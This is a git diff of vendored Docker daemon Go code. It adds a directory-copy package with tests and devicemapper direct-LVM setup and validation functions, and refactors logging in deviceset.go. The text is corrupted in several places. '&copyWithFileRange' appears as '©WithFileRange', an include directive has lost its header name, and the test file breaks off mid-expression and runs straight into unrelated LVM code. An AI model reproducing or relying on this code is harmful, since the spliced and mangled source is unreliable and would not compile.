+package copy // import "github.com/docker/docker/daemon/graphdriver/copy" + +/* +#include + +#ifndef FICLONE +#define FICLONE _IOW(0x94, 9, int) +#endif +*/ +import "C" +import ( + "container/list" + "fmt" + "io" + "os" + "path/filepath" + "syscall" + "time" + + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" + "golang.org/x/sys/unix" +) + +// Mode indicates whether to use hardlink or copy content +type Mode int + +const ( + // Content creates a new file, and 
copies the content of the file + Content Mode = iota + // Hardlink creates a new hardlink to the existing file + Hardlink +) + +func copyRegular(srcPath, dstPath string, fileinfo os.FileInfo, copyWithFileRange, copyWithFileClone *bool) error { + srcFile, err := os.Open(srcPath) + if err != nil { + return err + } + defer srcFile.Close() + + // If the destination file already exists, we shouldn't blow it away + dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE|os.O_EXCL, fileinfo.Mode()) + if err != nil { + return err + } + defer dstFile.Close() + + if *copyWithFileClone { + _, _, err = unix.Syscall(unix.SYS_IOCTL, dstFile.Fd(), C.FICLONE, srcFile.Fd()) + if err == nil { + return nil + } + + *copyWithFileClone = false + if err == unix.EXDEV { + *copyWithFileRange = false + } + } + if *copyWithFileRange { + err = doCopyWithFileRange(srcFile, dstFile, fileinfo) + // Trying the file_clone may not have caught the exdev case + // as the ioctl may not have been available (therefore EINVAL) + if err == unix.EXDEV || err == unix.ENOSYS { + *copyWithFileRange = false + } else { + return err + } + } + return legacyCopy(srcFile, dstFile) +} + +func doCopyWithFileRange(srcFile, dstFile *os.File, fileinfo os.FileInfo) error { + amountLeftToCopy := fileinfo.Size() + + for amountLeftToCopy > 0 { + n, err := unix.CopyFileRange(int(srcFile.Fd()), nil, int(dstFile.Fd()), nil, int(amountLeftToCopy), 0) + if err != nil { + return err + } + + amountLeftToCopy = amountLeftToCopy - int64(n) + } + + return nil +} + +func legacyCopy(srcFile io.Reader, dstFile io.Writer) error { + _, err := pools.Copy(dstFile, srcFile) + + return err +} + +func copyXattr(srcPath, dstPath, attr string) error { + data, err := system.Lgetxattr(srcPath, attr) + if err != nil { + return err + } + if data != nil { + if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil { + return err + } + } + return nil +} + +type fileID struct { + dev uint64 + ino uint64 +} + +type dirMtimeInfo struct { + 
dstPath *string + stat *syscall.Stat_t +} + +// DirCopy copies or hardlinks the contents of one directory to another, +// properly handling xattrs, and soft links +// +// Copying xattrs can be opted out of by passing false for copyXattrs. +func DirCopy(srcDir, dstDir string, copyMode Mode, copyXattrs bool) error { + copyWithFileRange := true + copyWithFileClone := true + + // This is a map of source file inodes to dst file paths + copiedFiles := make(map[fileID]string) + + dirsToSetMtimes := list.New() + err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(srcDir, srcPath) + if err != nil { + return err + } + + dstPath := filepath.Join(dstDir, relPath) + if err != nil { + return err + } + + stat, ok := f.Sys().(*syscall.Stat_t) + if !ok { + return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath) + } + + isHardlink := false + + switch f.Mode() & os.ModeType { + case 0: // Regular file + id := fileID{dev: stat.Dev, ino: stat.Ino} + if copyMode == Hardlink { + isHardlink = true + if err2 := os.Link(srcPath, dstPath); err2 != nil { + return err2 + } + } else if hardLinkDstPath, ok := copiedFiles[id]; ok { + if err2 := os.Link(hardLinkDstPath, dstPath); err2 != nil { + return err2 + } + } else { + if err2 := copyRegular(srcPath, dstPath, f, ©WithFileRange, ©WithFileClone); err2 != nil { + return err2 + } + copiedFiles[id] = dstPath + } + + case os.ModeDir: + if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) { + return err + } + + case os.ModeSymlink: + link, err := os.Readlink(srcPath) + if err != nil { + return err + } + + if err := os.Symlink(link, dstPath); err != nil { + return err + } + + case os.ModeNamedPipe: + fallthrough + case os.ModeSocket: + if err := unix.Mkfifo(dstPath, stat.Mode); err != nil { + return err + } + + case os.ModeDevice: + if rsystem.RunningInUserNS() { + // cannot create a device if 
running in user namespace + return nil + } + if err := unix.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil { + return err + } + + default: + return fmt.Errorf("unknown file type for %s", srcPath) + } + + // Everything below is copying metadata from src to dst. All this metadata + // already shares an inode for hardlinks. + if isHardlink { + return nil + } + + if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil { + return err + } + + if copyXattrs { + if err := doCopyXattrs(srcPath, dstPath); err != nil { + return err + } + } + + isSymlink := f.Mode()&os.ModeSymlink != 0 + + // There is no LChmod, so ignore mode for symlink. Also, this + // must happen after chown, as that can modify the file mode + if !isSymlink { + if err := os.Chmod(dstPath, f.Mode()); err != nil { + return err + } + } + + // system.Chtimes doesn't support a NOFOLLOW flag atm + // nolint: unconvert + if f.IsDir() { + dirsToSetMtimes.PushFront(&dirMtimeInfo{dstPath: &dstPath, stat: stat}) + } else if !isSymlink { + aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec)) + if err := system.Chtimes(dstPath, aTime, mTime); err != nil { + return err + } + } else { + ts := []syscall.Timespec{stat.Atim, stat.Mtim} + if err := system.LUtimesNano(dstPath, ts); err != nil { + return err + } + } + return nil + }) + if err != nil { + return err + } + for e := dirsToSetMtimes.Front(); e != nil; e = e.Next() { + mtimeInfo := e.Value.(*dirMtimeInfo) + ts := []syscall.Timespec{mtimeInfo.stat.Atim, mtimeInfo.stat.Mtim} + if err := system.LUtimesNano(*mtimeInfo.dstPath, ts); err != nil { + return err + } + } + + return nil +} + +func doCopyXattrs(srcPath, dstPath string) error { + if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil { + return err + } + + // We need to copy this attribute if it appears in an overlay upper layer, as + // this function is used to copy those. 
It is set by overlay if a directory + // is removed and then re-created and should not inherit anything from the + // same dir in the lower dir. + return copyXattr(srcPath, dstPath, "trusted.overlay.opaque") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go new file mode 100644 index 0000000000..0f3b1670f7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go @@ -0,0 +1,159 @@ +// +build linux + +package copy // import "github.com/docker/docker/daemon/graphdriver/copy" + +import ( + "fmt" + "io/ioutil" + "math/rand" + "os" + "path/filepath" + "syscall" + "testing" + "time" + + "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCopy(t *testing.T) { + copyWithFileRange := true + copyWithFileClone := true + doCopyTest(t, ©WithFileRange, ©WithFileClone) +} + +func TestCopyWithoutRange(t *testing.T) { + copyWithFileRange := false + copyWithFileClone := false + doCopyTest(t, ©WithFileRange, ©WithFileClone) +} + +func TestCopyDir(t *testing.T) { + srcDir, err := ioutil.TempDir("", "srcDir") + assert.NilError(t, err) + populateSrcDir(t, srcDir, 3) + + dstDir, err := ioutil.TempDir("", "testdst") + assert.NilError(t, err) + defer os.RemoveAll(dstDir) + + assert.Check(t, DirCopy(srcDir, dstDir, Content, false)) + assert.NilError(t, filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(srcDir, srcPath) + assert.NilError(t, err) + if relPath == "." { + return nil + } + + dstPath := filepath.Join(dstDir, relPath) + assert.NilError(t, err) + + // If we add non-regular dirs and files to the test + // then we need to add more checks here. 
+ dstFileInfo, err := os.Lstat(dstPath) + assert.NilError(t, err) + + srcFileSys := f.Sys().(*syscall.Stat_t) + dstFileSys := dstFileInfo.Sys().(*syscall.Stat_t) + + t.Log(relPath) + if srcFileSys.Dev == dstFileSys.Dev { + assert.Check(t, srcFileSys.Ino != dstFileSys.Ino) + } + // Todo: check size, and ctim is not equal + /// on filesystems that have granular ctimes + assert.Check(t, is.DeepEqual(srcFileSys.Mode, dstFileSys.Mode)) + assert.Check(t, is.DeepEqual(srcFileSys.Uid, dstFileSys.Uid)) + assert.Check(t, is.DeepEqual(srcFileSys.Gid, dstFileSys.Gid)) + assert.Check(t, is.DeepEqual(srcFileSys.Mtim, dstFileSys.Mtim)) + + return nil + })) +} + +func randomMode(baseMode int) os.FileMode { + for i := 0; i < 7; i++ { + baseMode = baseMode | (1&rand.Intn(2))< 0 && cfg.ThinpMetaPercent == 0) || cfg.ThinpMetaPercent > 0 && cfg.ThinpPercent == 0 { + return errThinpPercentMissing + } + + if cfg.ThinpPercent+cfg.ThinpMetaPercent > 100 { + return errThinpPercentTooBig + } + return nil +} + +func checkDevAvailable(dev string) error { + lvmScan, err := exec.LookPath("lvmdiskscan") + if err != nil { + logrus.Debug("could not find lvmdiskscan") + return nil + } + + out, err := exec.Command(lvmScan).CombinedOutput() + if err != nil { + logrus.WithError(err).Error(string(out)) + return nil + } + + if !bytes.Contains(out, []byte(dev)) { + return errors.Errorf("%s is not available for use with devicemapper", dev) + } + return nil +} + +func checkDevInVG(dev string) error { + pvDisplay, err := exec.LookPath("pvdisplay") + if err != nil { + logrus.Debug("could not find pvdisplay") + return nil + } + + out, err := exec.Command(pvDisplay, dev).CombinedOutput() + if err != nil { + logrus.WithError(err).Error(string(out)) + return nil + } + + scanner := bufio.NewScanner(bytes.NewReader(bytes.TrimSpace(out))) + for scanner.Scan() { + fields := strings.SplitAfter(strings.TrimSpace(scanner.Text()), "VG Name") + if len(fields) > 1 { + // got "VG Name" line" + vg := 
strings.TrimSpace(fields[1]) + if len(vg) > 0 { + return errors.Errorf("%s is already part of a volume group %q: must remove this device from any volume group or provide a different device", dev, vg) + } + logrus.Error(fields) + break + } + } + return nil +} + +func checkDevHasFS(dev string) error { + blkid, err := exec.LookPath("blkid") + if err != nil { + logrus.Debug("could not find blkid") + return nil + } + + out, err := exec.Command(blkid, dev).CombinedOutput() + if err != nil { + logrus.WithError(err).Error(string(out)) + return nil + } + + fields := bytes.Fields(out) + for _, f := range fields { + kv := bytes.Split(f, []byte{'='}) + if bytes.Equal(kv[0], []byte("TYPE")) { + v := bytes.Trim(kv[1], "\"") + if len(v) > 0 { + return errors.Errorf("%s has a filesystem already, use dm.directlvm_device_force=true if you want to wipe the device", dev) + } + return nil + } + } + return nil +} + +func verifyBlockDevice(dev string, force bool) error { + if err := checkDevAvailable(dev); err != nil { + return err + } + if err := checkDevInVG(dev); err != nil { + return err + } + if force { + return nil + } + return checkDevHasFS(dev) +} + +func readLVMConfig(root string) (directLVMConfig, error) { + var cfg directLVMConfig + + p := filepath.Join(root, "setup-config.json") + b, err := ioutil.ReadFile(p) + if err != nil { + if os.IsNotExist(err) { + return cfg, nil + } + return cfg, errors.Wrap(err, "error reading existing setup config") + } + + // check if this is just an empty file, no need to produce a json error later if so + if len(b) == 0 { + return cfg, nil + } + + err = json.Unmarshal(b, &cfg) + return cfg, errors.Wrap(err, "error unmarshaling previous device setup config") +} + +func writeLVMConfig(root string, cfg directLVMConfig) error { + p := filepath.Join(root, "setup-config.json") + b, err := json.Marshal(cfg) + if err != nil { + return errors.Wrap(err, "error marshalling direct lvm config") + } + err = ioutil.WriteFile(p, b, 0600) + return 
errors.Wrap(err, "error writing direct lvm config to file") +} + +func setupDirectLVM(cfg directLVMConfig) error { + lvmProfileDir := "/etc/lvm/profile" + binaries := []string{"pvcreate", "vgcreate", "lvcreate", "lvconvert", "lvchange", "thin_check"} + + for _, bin := range binaries { + if _, err := exec.LookPath(bin); err != nil { + return errors.Wrap(err, "error looking up command `"+bin+"` while setting up direct lvm") + } + } + + err := os.MkdirAll(lvmProfileDir, 0755) + if err != nil { + return errors.Wrap(err, "error creating lvm profile directory") + } + + if cfg.AutoExtendPercent == 0 { + cfg.AutoExtendPercent = 20 + } + + if cfg.AutoExtendThreshold == 0 { + cfg.AutoExtendThreshold = 80 + } + + if cfg.ThinpPercent == 0 { + cfg.ThinpPercent = 95 + } + if cfg.ThinpMetaPercent == 0 { + cfg.ThinpMetaPercent = 1 + } + + out, err := exec.Command("pvcreate", "-f", cfg.Device).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + out, err = exec.Command("vgcreate", "docker", cfg.Device).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + out, err = exec.Command("lvcreate", "--wipesignatures", "y", "-n", "thinpool", "docker", "--extents", fmt.Sprintf("%d%%VG", cfg.ThinpPercent)).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + out, err = exec.Command("lvcreate", "--wipesignatures", "y", "-n", "thinpoolmeta", "docker", "--extents", fmt.Sprintf("%d%%VG", cfg.ThinpMetaPercent)).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + out, err = exec.Command("lvconvert", "-y", "--zero", "n", "-c", "512K", "--thinpool", "docker/thinpool", "--poolmetadata", "docker/thinpoolmeta").CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + profile := fmt.Sprintf("activation{\nthin_pool_autoextend_threshold=%d\nthin_pool_autoextend_percent=%d\n}", cfg.AutoExtendThreshold, cfg.AutoExtendPercent) + err = 
ioutil.WriteFile(lvmProfileDir+"/docker-thinpool.profile", []byte(profile), 0600) + if err != nil { + return errors.Wrap(err, "error writing docker thinp autoextend profile") + } + + out, err = exec.Command("lvchange", "--metadataprofile", "docker-thinpool", "docker/thinpool").CombinedOutput() + return errors.Wrap(err, string(out)) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go index b8e762592c..2bfbf05a27 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go @@ -1,11 +1,10 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "bufio" "encoding/json" - "errors" "fmt" "io" "io/ioutil" @@ -13,47 +12,46 @@ import ( "os/exec" "path" "path/filepath" + "reflect" "strconv" "strings" "sync" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/devicemapper" + "github.com/docker/docker/pkg/dmesg" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/loopback" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/go-units" - - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) var ( - defaultDataLoopbackSize int64 = 100 * 1024 * 1024 * 1024 - defaultMetaDataLoopbackSize int64 = 2 * 1024 * 1024 * 1024 - defaultBaseFsSize uint64 = 10 * 1024 * 1024 * 1024 - defaultThinpBlockSize uint32 = 128 // 64K = 128 512b sectors - defaultUdevSyncOverride = false - maxDeviceID = 0xffffff // 24 bit, pool limit - deviceIDMapSz = 
(maxDeviceID + 1) / 8 - // We retry device removal so many a times that even error messages - // will fill up console during normal operation. So only log Fatal - // messages by default. - logLevel = devicemapper.LogLevelFatal + defaultDataLoopbackSize int64 = 100 * 1024 * 1024 * 1024 + defaultMetaDataLoopbackSize int64 = 2 * 1024 * 1024 * 1024 + defaultBaseFsSize uint64 = 10 * 1024 * 1024 * 1024 + defaultThinpBlockSize uint32 = 128 // 64K = 128 512b sectors + defaultUdevSyncOverride = false + maxDeviceID = 0xffffff // 24 bit, pool limit + deviceIDMapSz = (maxDeviceID + 1) / 8 driverDeferredRemovalSupport = false enableDeferredRemoval = false enableDeferredDeletion = false userBaseSize = false defaultMinFreeSpacePercent uint32 = 10 + lvmSetupConfigForce bool ) -const deviceSetMetaFile string = "deviceset-metadata" -const transactionMetaFile string = "transaction-metadata" +const deviceSetMetaFile = "deviceset-metadata" +const transactionMetaFile = "transaction-metadata" type transaction struct { OpenTransactionID uint64 `json:"open_transaction_id"` @@ -123,6 +121,7 @@ type DeviceSet struct { gidMaps []idtools.IDMap minFreeSpacePercent uint32 //min free space percentage in thinpool xfsNospaceRetries string // max retries when xfs receives ENOSPC + lvmSetupConfig directLVMConfig } // DiskUsage contains information about disk usage and is used when reporting Status of a device. 
@@ -269,7 +268,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { if err != nil { return "", err } - if err := idtools.MkdirAllAs(dirname, 0700, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(dirname, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil { return "", err } @@ -277,7 +276,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { if !os.IsNotExist(err) { return "", err } - logrus.Debugf("devmapper: Creating loopback file %s for device-manage use", filename) + logrus.WithField("storage-driver", "devicemapper").Debugf("Creating loopback file %s for device-manage use", filename) file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600) if err != nil { return "", err @@ -298,7 +297,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { return "", fmt.Errorf("devmapper: Unable to grow loopback file %s: %v", filename, err) } } else if fi.Size() > size { - logrus.Warnf("devmapper: Can't shrink loopback file %s", filename) + logrus.WithField("storage-driver", "devicemapper").Warnf("Can't shrink loopback file %s", filename) } } return filename, nil @@ -356,10 +355,7 @@ func (devices *DeviceSet) saveMetadata(info *devInfo) error { if err != nil { return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err) } - if err := devices.writeMetaFile(jsonData, devices.metadataFile(info)); err != nil { - return err - } - return nil + return devices.writeMetaFile(jsonData, devices.metadataFile(info)) } func (devices *DeviceSet) markDeviceIDUsed(deviceID int) { @@ -380,10 +376,7 @@ func (devices *DeviceSet) isDeviceIDFree(deviceID int) bool { var mask byte i := deviceID % 8 mask = (1 << uint(i)) - if (devices.deviceIDMap[deviceID/8] & mask) != 0 { - return false - } - return true + return (devices.deviceIDMap[deviceID/8] & mask) == 0 } // Should be called with devices.Lock() held. 
@@ -410,39 +403,40 @@ func (devices *DeviceSet) lookupDeviceWithLock(hash string) (*devInfo, error) { // This function relies on that device hash map has been loaded in advance. // Should be called with devices.Lock() held. func (devices *DeviceSet) constructDeviceIDMap() { - logrus.Debug("devmapper: constructDeviceIDMap()") - defer logrus.Debug("devmapper: constructDeviceIDMap() END") + logrus.WithField("storage-driver", "devicemapper").Debug("constructDeviceIDMap()") + defer logrus.WithField("storage-driver", "devicemapper").Debug("constructDeviceIDMap() END") for _, info := range devices.Devices { devices.markDeviceIDUsed(info.DeviceID) - logrus.Debugf("devmapper: Added deviceId=%d to DeviceIdMap", info.DeviceID) + logrus.WithField("storage-driver", "devicemapper").Debugf("Added deviceId=%d to DeviceIdMap", info.DeviceID) } } func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) error { + logger := logrus.WithField("storage-driver", "devicemapper") // Skip some of the meta files which are not device files. 
if strings.HasSuffix(finfo.Name(), ".migrated") { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } if strings.HasPrefix(finfo.Name(), ".") { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } if finfo.Name() == deviceSetMetaFile { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } if finfo.Name() == transactionMetaFile { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } - logrus.Debugf("devmapper: Loading data for file %s", path) + logger.Debugf("Loading data for file %s", path) hash := finfo.Name() if hash == "base" { @@ -459,12 +453,12 @@ func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) } func (devices *DeviceSet) loadDeviceFilesOnStart() error { - logrus.Debug("devmapper: loadDeviceFilesOnStart()") - defer logrus.Debug("devmapper: loadDeviceFilesOnStart() END") + logrus.WithField("storage-driver", "devicemapper").Debug("loadDeviceFilesOnStart()") + defer logrus.WithField("storage-driver", "devicemapper").Debug("loadDeviceFilesOnStart() END") var scan = func(path string, info os.FileInfo, err error) error { if err != nil { - logrus.Debugf("devmapper: Can't walk the file %s", path) + logrus.WithField("storage-driver", "devicemapper").Debugf("Can't walk the file %s", path) return nil } @@ -480,17 +474,16 @@ func (devices *DeviceSet) loadDeviceFilesOnStart() error { } // Should be called with devices.Lock() held. 
-func (devices *DeviceSet) unregisterDevice(id int, hash string) error { - logrus.Debugf("devmapper: unregisterDevice(%v, %v)", id, hash) +func (devices *DeviceSet) unregisterDevice(hash string) error { + logrus.WithField("storage-driver", "devicemapper").Debugf("unregisterDevice(%v)", hash) info := &devInfo{ - Hash: hash, - DeviceID: id, + Hash: hash, } delete(devices.Devices, hash) if err := devices.removeMetadata(info); err != nil { - logrus.Debugf("devmapper: Error removing metadata: %s", err) + logrus.WithField("storage-driver", "devicemapper").Debugf("Error removing metadata: %s", err) return err } @@ -499,7 +492,7 @@ func (devices *DeviceSet) unregisterDevice(id int, hash string) error { // Should be called with devices.Lock() held. func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, transactionID uint64) (*devInfo, error) { - logrus.Debugf("devmapper: registerDevice(%v, %v)", id, hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("registerDevice(%v, %v)", id, hash) info := &devInfo{ Hash: hash, DeviceID: id, @@ -521,7 +514,7 @@ func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, trans } func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bool) error { - logrus.Debugf("devmapper: activateDeviceIfNeeded(%v)", info.Hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("activateDeviceIfNeeded(%v)", info.Hash) if info.Deleted && !ignoreDeleted { return fmt.Errorf("devmapper: Can't activate device %v as it is marked for deletion", info.Hash) @@ -540,11 +533,11 @@ func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bo return devicemapper.ActivateDevice(devices.getPoolDevName(), info.Name(), info.DeviceID, info.Size) } -// Return true only if kernel supports xfs and mkfs.xfs is available -func xfsSupported() bool { +// xfsSupported checks if xfs is supported, returns nil if it is, otherwise an error +func xfsSupported() error { // Make sure 
mkfs.xfs is available if _, err := exec.LookPath("mkfs.xfs"); err != nil { - return false + return err // error text is descriptive enough } // Check if kernel supports xfs filesystem or not. @@ -552,40 +545,47 @@ func xfsSupported() bool { f, err := os.Open("/proc/filesystems") if err != nil { - logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) - return false + return errors.Wrapf(err, "error checking for xfs support") } defer f.Close() s := bufio.NewScanner(f) for s.Scan() { if strings.HasSuffix(s.Text(), "\txfs") { - return true + return nil } } if err := s.Err(); err != nil { - logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) + return errors.Wrapf(err, "error checking for xfs support") } - return false + + return errors.New(`kernel does not support xfs, or "modprobe xfs" failed`) } func determineDefaultFS() string { - if xfsSupported() { + err := xfsSupported() + if err == nil { return "xfs" } - logrus.Warn("devmapper: XFS is not supported in your system. Either the kernel doesn't support it or mkfs.xfs is not in your PATH. Defaulting to ext4 filesystem") + logrus.WithField("storage-driver", "devicemapper").Warnf("XFS is not supported in your system (%v). Defaulting to ext4 filesystem", err) return "ext4" } -func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { - devname := info.DevName() +// mkfsOptions tries to figure out whether some additional mkfs options are required +func mkfsOptions(fs string) []string { + if fs == "xfs" && !kernel.CheckKernelVersion(3, 16, 0) { + // For kernels earlier than 3.16 (and newer xfsutils), + // some xfs features need to be explicitly disabled. + return []string{"-m", "crc=0,finobt=0"} + } - args := []string{} - args = append(args, devices.mkfsArgs...) 
+ return []string{} +} - args = append(args, devname) +func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { + devname := info.DevName() if devices.filesystem == "" { devices.filesystem = determineDefaultFS() @@ -594,12 +594,16 @@ func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { return err } - logrus.Infof("devmapper: Creating filesystem %s on device %s", devices.filesystem, info.Name()) + args := mkfsOptions(devices.filesystem) + args = append(args, devices.mkfsArgs...) + args = append(args, devname) + + logrus.WithField("storage-driver", "devicemapper").Infof("Creating filesystem %s on device %s, mkfs args: %v", devices.filesystem, info.Name(), args) defer func() { if err != nil { - logrus.Infof("devmapper: Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err) + logrus.WithField("storage-driver", "devicemapper").Infof("Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err) } else { - logrus.Infof("devmapper: Successfully created filesystem %s on device %s", devices.filesystem, info.Name()) + logrus.WithField("storage-driver", "devicemapper").Infof("Successfully created filesystem %s on device %s", devices.filesystem, info.Name()) } }() @@ -665,7 +669,7 @@ func (devices *DeviceSet) cleanupDeletedDevices() error { if !info.Deleted { continue } - logrus.Debugf("devmapper: Found deleted device %s.", info.Hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("Found deleted device %s.", info.Hash) deletedDevices = append(deletedDevices, info) } @@ -676,7 +680,7 @@ func (devices *DeviceSet) cleanupDeletedDevices() error { for _, info := range deletedDevices { // This will again try deferred deletion. 
if err := devices.DeleteDevice(info.Hash, false); err != nil { - logrus.Warnf("devmapper: Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err) + logrus.WithField("storage-driver", "devicemapper").Warnf("Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err) } } @@ -698,7 +702,7 @@ func (devices *DeviceSet) startDeviceDeletionWorker() { return } - logrus.Debug("devmapper: Worker to cleanup deleted devices started") + logrus.WithField("storage-driver", "devicemapper").Debug("Worker to cleanup deleted devices started") for range devices.deletionWorkerTicker.C { devices.cleanupDeletedDevices() } @@ -794,8 +798,10 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { return nil, err } + logger := logrus.WithField("storage-driver", "devicemapper") + if err := devices.openTransaction(hash, deviceID); err != nil { - logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + logger.Debugf("Error opening transaction hash = %s deviceID = %d", hash, deviceID) devices.markDeviceIDFree(deviceID) return nil, err } @@ -807,7 +813,7 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { // happen. Now we have a mechanism to find // a free device ID. So something is not right. // Give a warning and continue. 
- logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + logger.Errorf("Device ID %d exists in pool but it is supposed to be unused", deviceID) deviceID, err = devices.getNextFreeDeviceID() if err != nil { return nil, err @@ -816,14 +822,14 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { devices.refreshTransaction(deviceID) continue } - logrus.Debugf("devmapper: Error creating device: %s", err) + logger.Debugf("Error creating device: %s", err) devices.markDeviceIDFree(deviceID) return nil, err } break } - logrus.Debugf("devmapper: Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize) + logger.Debugf("Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize) info, err := devices.registerDevice(deviceID, hash, devices.baseFsSize, devices.OpenTransactionID) if err != nil { _ = devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) @@ -832,7 +838,7 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { } if err := devices.closeTransaction(); err != nil { - devices.unregisterDevice(deviceID, hash) + devices.unregisterDevice(hash) devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) devices.markDeviceIDFree(deviceID) return nil, err @@ -862,6 +868,7 @@ func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint if err != devicemapper.ErrEnxio { return err } + devinfo = nil } else { defer devices.deactivateDevice(baseInfo) } @@ -882,11 +889,7 @@ func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint defer devicemapper.ResumeDevice(baseInfo.Name()) } - if err = devices.createRegisterSnapDevice(hash, baseInfo, size); err != nil { - return err - } - - return nil + return devices.createRegisterSnapDevice(hash, baseInfo, size) } func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInfo, size uint64) error { @@ -895,8 +898,10 @@ func (devices 
*DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf return err } + logger := logrus.WithField("storage-driver", "devicemapper") + if err := devices.openTransaction(hash, deviceID); err != nil { - logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + logger.Debugf("Error opening transaction hash = %s deviceID = %d", hash, deviceID) devices.markDeviceIDFree(deviceID) return err } @@ -908,7 +913,7 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf // happen. Now we have a mechanism to find // a free device ID. So something is not right. // Give a warning and continue. - logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + logger.Errorf("Device ID %d exists in pool but it is supposed to be unused", deviceID) deviceID, err = devices.getNextFreeDeviceID() if err != nil { return err @@ -917,7 +922,7 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf devices.refreshTransaction(deviceID) continue } - logrus.Debugf("devmapper: Error creating snap device: %s", err) + logger.Debugf("Error creating snap device: %s", err) devices.markDeviceIDFree(deviceID) return err } @@ -927,12 +932,12 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf if _, err := devices.registerDevice(deviceID, hash, size, devices.OpenTransactionID); err != nil { devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) 